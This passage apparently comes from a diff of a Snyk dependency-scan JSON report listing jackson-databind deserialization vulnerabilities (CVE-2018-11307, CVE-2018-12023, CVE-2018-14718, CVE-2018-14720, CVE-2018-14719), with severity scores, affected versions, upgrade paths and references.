Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", + "epssDetails": { + "percentile": "0.85803", + "probability": "0.01278", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-11307" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qr7j-h6gg-jmgc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:14:00.916831Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-10T17:10:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:10:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:26.624837Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2058", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.092429Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", + "epssDetails": { + "percentile": "0.82708", + "probability": "0.00890", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12023" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6wqp-v4v6-c87c" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:16:09.944095Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:15:50Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:15:49Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:43.326081Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.637612Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.92634", + "probability": "0.04626", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14718" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-645p-88qh-w398" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:07.540945Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:19:49Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:19:41Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:22.234808Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.195569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.84205", + "probability": "0.01052", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14720" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-x2w5-5m2g-7h5m" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:22.141403Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:20:17Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:19:17Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:33.930153Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", + "title": "GitHub Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.120318Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.85805", + "probability": "0.01269", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14719" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-4gq5-ch57-c2mg" + ] + }, + "packageName": 